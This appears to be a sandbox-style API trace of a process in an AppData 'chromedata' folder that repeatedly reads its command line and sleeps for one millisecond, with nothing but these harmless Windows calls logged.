	[0056.412] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x17faa8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0056.412] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0056.412] Sleep (dwMilliseconds=0x1) 
	[0056.525] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x17fb38*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0056.525] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0056.525] Sleep (dwMilliseconds=0x1) 
	[0056.629] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x16efd8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0056.629] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0056.629] Sleep (dwMilliseconds=0x1) 
	[0056.699] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x199768*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0056.699] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0056.699] Sleep (dwMilliseconds=0x1) 
	[0056.748] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1997f8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0056.748] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0056.748] Sleep (dwMilliseconds=0x1) 
	[0056.786] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x199888*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0056.786] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0056.786] Sleep (dwMilliseconds=0x1) 
	[0056.878] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x199918*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0056.878] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0056.878] Sleep (dwMilliseconds=0x1) 
	[0056.974] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x1999a8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0056.974] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0056.974] Sleep (dwMilliseconds=0x1) 
	[0057.035] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x199a38*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0057.035] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0057.035] Sleep (dwMilliseconds=0x1) 
	[0057.129] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x199ac8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0057.129] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0057.129] Sleep (dwMilliseconds=0x1) 
	[0057.225] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x199b58*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0057.225] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0057.225] Sleep (dwMilliseconds=0x1) 
	[0057.302] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x199be8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0057.302] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0057.302] Sleep (dwMilliseconds=0x1) 
	[0057.349] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x199c78*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0057.349] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0057.349] Sleep (dwMilliseconds=0x1) 
	[0057.386] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x199d08*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0057.386] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0057.386] Sleep (dwMilliseconds=0x1) 
	[0057.499] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x199d98*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0057.499] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0057.499] Sleep (dwMilliseconds=0x1) 
	[0057.580] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x199e28*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0057.580] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0057.580] Sleep (dwMilliseconds=0x1) 
	[0057.676] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x199eb8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0057.676] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0057.676] Sleep (dwMilliseconds=0x1) 
	[0057.786] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x199f48*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0057.786] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0057.786] Sleep (dwMilliseconds=0x1) 
	[0057.896] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x199fd8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0057.896] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0057.896] Sleep (dwMilliseconds=0x1) 
	[0057.986] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19a068*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0057.986] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0057.986] Sleep (dwMilliseconds=0x1) 
	[0058.079] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19a0f8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0058.079] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0058.079] Sleep (dwMilliseconds=0x1) 
	[0058.173] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19a188*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0058.173] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0058.173] Sleep (dwMilliseconds=0x1) 
	[0058.282] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19a218*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0058.282] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0058.282] Sleep (dwMilliseconds=0x1) 
	[0058.397] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19a2a8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0058.397] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0058.397] Sleep (dwMilliseconds=0x1) 
	[0058.485] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19a338*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0058.487] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0058.487] Sleep (dwMilliseconds=0x1) 
	[0058.579] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19a3c8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0058.579] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0058.579] Sleep (dwMilliseconds=0x1) 
	[0058.658] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19a458*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0058.658] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0058.658] Sleep (dwMilliseconds=0x1) 
	[0058.750] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19a4e8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0058.750] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0058.750] Sleep (dwMilliseconds=0x1) 
	[0058.844] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19a578*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0058.844] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0058.844] Sleep (dwMilliseconds=0x1) 
	[0058.937] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19a608*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0058.938] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0058.938] Sleep (dwMilliseconds=0x1) 
	[0059.031] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19a698*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0059.031] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0059.031] Sleep (dwMilliseconds=0x1) 
	[0059.111] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19a728*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0059.111] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0059.111] Sleep (dwMilliseconds=0x1) 
	[0059.227] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19a7b8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0059.227] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0059.227] Sleep (dwMilliseconds=0x1) 
	[0059.315] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19a848*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0059.315] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0059.315] Sleep (dwMilliseconds=0x1) 
	[0059.437] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19a8d8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0059.437] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0059.437] Sleep (dwMilliseconds=0x1) 
	[0059.553] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19a968*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0059.553] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0059.553] Sleep (dwMilliseconds=0x1) 
	[0059.637] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19a9f8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0059.637] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0059.637] Sleep (dwMilliseconds=0x1) 
	[0059.740] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19aa88*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0059.740] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0059.740] Sleep (dwMilliseconds=0x1) 
	[0059.830] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19ab18*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0059.830] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0059.830] Sleep (dwMilliseconds=0x1) 
	[0059.880] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19aba8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0059.881] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0059.881] Sleep (dwMilliseconds=0x1) 
	[0060.023] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19ac38*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0060.023] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0060.023] Sleep (dwMilliseconds=0x1) 
	[0060.100] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19acc8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0060.100] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0060.100] Sleep (dwMilliseconds=0x1) 
	[0060.174] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19ad58*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0060.174] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0060.174] Sleep (dwMilliseconds=0x1) 
	[0060.299] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19ade8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0060.299] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0060.299] Sleep (dwMilliseconds=0x1) 
	[0060.482] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19ae78*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0060.484] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0060.484] Sleep (dwMilliseconds=0x1) 
	[0060.582] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19af08*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0060.582] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0060.582] Sleep (dwMilliseconds=0x1) 
	[0060.631] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19af98*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0060.631] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0060.631] Sleep (dwMilliseconds=0x1) 
	[0060.712] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19b028*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0060.712] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0060.712] Sleep (dwMilliseconds=0x1) 
	[0060.799] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19b0b8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0060.800] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0060.800] Sleep (dwMilliseconds=0x1) 
	[0060.909] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19b148*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0060.909] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0060.909] Sleep (dwMilliseconds=0x1) 
	[0060.950] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19b1d8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0060.950] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0060.950] Sleep (dwMilliseconds=0x1) 
	[0060.997] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19b268*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0060.997] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0060.997] Sleep (dwMilliseconds=0x1) 
	[0061.043] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19b2f8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.043] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.043] Sleep (dwMilliseconds=0x1) 
	[0061.091] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19b388*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.091] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.091] Sleep (dwMilliseconds=0x1) 
	[0061.137] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19b418*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.137] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.137] Sleep (dwMilliseconds=0x1) 
	[0061.184] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" ", pNumArgs=0x1a4905d | out: pNumArgs=0x1a4905d) returned 0x19b4a8*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0061.184] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe\" "
	[0061.184] Sleep (dwMilliseconds=0x1) 
